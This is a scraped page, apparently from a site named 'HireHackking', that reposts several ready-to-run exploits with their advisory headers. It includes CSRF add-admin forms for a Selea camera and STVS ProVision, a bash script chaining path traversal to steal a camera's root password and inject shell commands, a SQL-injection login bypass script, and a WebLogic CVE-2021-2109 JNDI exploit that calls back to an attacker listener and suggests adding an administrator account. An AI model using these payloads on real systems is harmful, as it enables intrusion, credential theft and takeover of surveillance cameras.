https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5618.php 07.11.2020 -- Add Admin: ---------- <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.1.17\/save_params.php", true); xhr.setRequestHeader("Accept", "*\/*"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=cfgboundary-----------------------1607475234133"); xhr.withCredentials = true; var body = "--cfgboundary-----------------------1607475234133\r\n" + "Content-Disposition: form-data; name=\"set_params\"\r\n" + "\r\n" + "upload\r\n" + "--cfgboundary-----------------------1607475234133\r\n" + "Content-Disposition: form-data; name=\"user_file\"; filename=\"set_params.dat\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "[SECURITY.USERS]\r\n" + "security-users-0-username = testingus\r\n" + "security-users-0-password = testingus\r\n" + "security-users-0-rights = 2\r\n" + "security-users-1-username = \r\n" + "security-users-1-password = \r\n" + "security-users-1-rights = 0\r\n" + "security-users-2-username = \r\n" + "security-users-2-password = \r\n" + "security-users-2-rights = 0\r\n" + "security-users-3-username = \r\n" + "security-users-3-password = \r\n" + "security-users-3-rights = 0\r\n" + "security-allow_viewers_storage_access = 1\r\n" + "CFG_ROOTPASS = admin\r\n" + "\r\n" + "--cfgboundary-----------------------1607475234133--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Add Admin" onclick="submitRequest();" /> </form> </body> </html>
  21. HireHackking

    Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream disclosure when p1.mjpg or p1.264 is called. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5619 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php 07.11.2020 -- Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg
  22. HireHackking

    Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com #!/bin/bash # # Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution # # # Vendor: Selea s.r.l. # Product web page: https://www.selea.com # Affected version: Model: iZero # Targa 512 # Targa 504 # Targa Semplice # Targa 704 TKM # Targa 805 # Targa 710 INOX # Targa 750 # Targa 704 ILB # Firmware: BLD201113005214 # BLD201106163745 # BLD200304170901 # BLD200304170514 # BLD200303143345 # BLD191118145435 # BLD191021180140 # BLD191021180140 # CPS: 4.013(201105) # 3.100(200225) # 3.005(191206) # 3.005(191112) # # Summary: IP camera with optical character recognition (OCR) software for automatic # number plate recognition (ANPR) also equipped with ADR system that enables it to read # the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number # of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number # plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes # this camera suitable for all installation conditions. Its built-in OCR software works # as an automatic and independent system without the need of a computer, thus giving # autonomy to the device even in the event of an interruption in the connection between # the camera and the operations centre. # # Desc: Selea suffers from an authenticated command injection vulnerability. This can be # exploited to inject and execute arbitrary shell commands as the www-data user through # the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated # LFI issue an attacker can grab credentials, authenticate and execute system commands. # # ===================================================================================== # /mnt/app/scripts/address_check.sh: # ---------------------------------- # # 01: #!/bin/sh # 02: . /mnt/app/scripts/env.sh # 03: . /mnt/app/scripts/log.sh # 04: # 05: CMD="$1" # 06: ADDR="$2" # 07: PORT="$3" # 08: # 09: if [ "$CMD" == "ping" ]; then # 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 ) # 11: elif [ "$CMD" == "port" ]; then # 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT" # 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 ) # 14: fi # 15: # 16: echo -e "$RESULT" # # ===================================================================================== # # Tested on: GNU/Linux 3.10.53 (armv7l) # PHP/5.6.22 # selea_httpd # HttpServer/0.1 # SeleaCPSHttpServer/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5620 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php # # # 07.11.2020 # # # PoC chained exploit (as admin): # # solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id # Password found: testingus # Using Authorization: YWRtaW46dGVzdGluZ3VzCg== # Using command: id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # IP=$1 CMD=$2 PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'` echo 'Password found: '${PWD} AUTH=$(echo admin:${PWD} | base64) echo 'Using Authorization: '${AUTH} echo 'Using command: '${CMD} curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
  23. HireHackking

    Library System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP 7.4.4 # Description: Library System 1.0 - Authentication Bypass Via SQL Injection #STEP 1 : Run The Exploit With This Command : python3 exploit.py #STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/ #STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. #Note - You Will Only Be Able To Access The Student Area as a Privileged User. import requests YELLOW = '\033[33m' # Yellow Text GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults print(YELLOW+' _ ______ _ _ ___ ', RESET) print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET) print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET) print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET) print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET) print(YELLOW+" ", RESET) print('********************************************************') print('** LIBRARY SYSTEM 1.0 **') print('** AUTHENTICATION BYPASS USING SQL INJECTION **') print('********************************************************') print('Author - Himanshu Shukla') #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"student":"'or 1 or'","login":""} r=s.post(LINK+'login.php', data=values, cookies=cookies) r=s.post(LINK+'login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if not("Student not found" in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET)
  24. HireHackking

    Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated) # Date: 2021-01-21 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html # Vendor Homepage: https://www.oracle.com # Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1) # Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2 # CVE: CVE-2021-2109 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-2109.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from https://github.com/welk1n/JNDI-Injection-Exploit to be in the same folder ''' import urllib.request, urllib.parse, http.cookiejar, ssl import sys, os, optparse, subprocess, threading, time ## Static vars; change at will, but recommend leaving as is sURL = 'http://192.168.0.100:7001' iTimeout = 5 oRun = None ## Ignore unsigned certs, if any because WebLogic is default HTTP ssl._create_default_https_context = ssl._create_unverified_context class runJar(threading.Thread): def __init__(self, sJarFile, sCMD, sAddress): self.stdout = [] self.stderr = '' self.cmd = sCMD self.addr = sAddress self.jarfile = sJarFile self.proc = None threading.Thread.__init__(self) def run(self): self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) for line in iter(self.proc.stderr.readline, ''): self.stderr += line def findJNDI(): sCurDir = os.getcwd() sFile = '' for file in os.listdir(sCurDir): if 'JNDI' in file and '.jar' in file: sFile = file print('[+] Found and using ' + sFile) return sFile def findJAVA(bVerbose): try: oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) except: exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') sResult = list(oProc.stdout)[0].decode() if bVerbose: print('[+] Found Java: ' + sResult) def checkParams(options, args): if args: sHost = args[0] else: sHost = input('[?] Please enter the URL ['+sURL+'] : ') if sHost == '': sHost = sURL if sHost[-1:] == '/': sHost = sHost[:-1] if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost if options.username: sUser = options.username else: sUser = input('[?] Username [weblogic] : ') if sUser == '': sUser = 'weblogic' if options.password: sPass = options.password else: sPass = input('[?] Password [Passw0rd-] : ') if sPass == '': sPass = 'Passw0rd-' if options.command: sCMD = options.command else: sCMD = input('[?] Command to run [calc] : ') if sCMD == '': sCMD = 'calc' if options.listenaddr: sLHOST = options.listenaddr else: sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ') if sLHOST == '': sLHOST = '192.168.0.10' if options.verbose: bVerbose = True else: bVerbose = False return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) def startListener(sJarFile, sCMD, sAddress, bVerbose): global oRun oRun = runJar(sJarFile, sCMD, sAddress) oRun.start() print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') oRun.join(3) if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr) bThisLine=False if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') for line in oRun.stdout: if bThisLine: return line.split('/')[3].replace('\n','') if 'JDK 1.8' in line: bThisLine = True def endIt(): global oRun print('[+] Closing threads') if oRun: oRun.proc.terminate() exit(0) def main(): usage = ( 'usage: %prog [options] URL \n' ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' ' in the current working folder\n' 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' 'Only works when hacker is reachable via an IPv4 address\n' 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n' 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' ) parser = optparse.OptionParser(usage=usage) parser.add_option('--username', '-u', dest='username') parser.add_option('--password', '-p', dest='password') parser.add_option('--command', '-c', dest='command') parser.add_option('--listen', '-l', dest='listenaddr') parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) ## Get or ask for the vars (options, args) = parser.parse_args() (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) ## Verify Java and JAR file sJarFile = findJNDI() findJAVA(bVerbose) ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) print('[+] Verifying reachability') ## Get the cookie oRequest = urllib.request.Request(url = sHost + '/console/') oResponse = oOpener.open(oRequest, timeout = iTimeout) for c in cj: if c.name == 'ADMINCONSOLESESSION': if bVerbose: print('[+] Got cookie "' + c.value + '"') ## Logging in lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) sResult = oResponse.read().decode(errors='ignore').split('\r\n') bSuccess = True for line in sResult: if 'Authentication Denied' in line: bSuccess = False if bSuccess: print('[+] Succesfully logged in!\n') else: exit('[-] Authentication Denied') ## Launch the LDAP listener and retrieve the random endpoint value sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) if bVerbose: print('[+] Got Java value: ' + sRandom) ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1" print('\n[+] Firing exploit now, hold on') ## http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-) sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' if bVerbose: print('[!] Using URL ' + sFullUrl) oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) time.sleep(5) bExploitWorked = False for line in oRun.stdout: if 'Log a request' in line: bExploitWorked = True if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') if not bExploitWorked: print('[-] Exploit failed, victim likely patched') else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') if bVerbose: print(oRun.stderr) endIt() if __name__ == "__main__": try: main() except KeyboardInterrupt: endIt()
  25. HireHackking

    STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin) # Date: 19.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.stvs.ch STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin) Vendor: STVS SA Product web page: http://www.stvs.ch Platform: Ruby Affected version: 5.9.10 (build 2885-3a8219a) 5.9.9 (build 2882-7c3b787) 5.9.7 (build 2871-a450938) 5.9.1 (build 2771-1bbed11) 5.9.0 (build 2701-6123026) 5.8.6 (build 2557-84726f7) 5.7 5.6 5.5 Summary: STVS is a Swiss company specializing in development of software for digital video recording for surveillance cameras as well as the establishment of powerful and user-friendly IP video surveillance networks. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Ubuntu 14.04.3 nginx/1.12.1 nginx/1.4.6 nginx/1.1.19 nginx/0.7.65 nginx/0.3.61 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5625 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php 19.01.2021 -- <html> <body> <form action="http://192.168.1.17/users/create" method="POST"> <input type="hidden" name="login" value="testingus" /> <input type="hidden" name="password" value="testingus" /> <input type="hidden" name="confirm&#95;password" value="testingus" /> <input type="hidden" name="email" value="test&#64;test&#46;tld" /> <input type="hidden" name="role&#95;id" value="1" /> <input type="hidden" name="never&#95;expire" value="on" /> <input type="hidden" name="disabled&#95;acc" value="false" /> <input type="submit" value="Forge request" /> </form> </body> </html>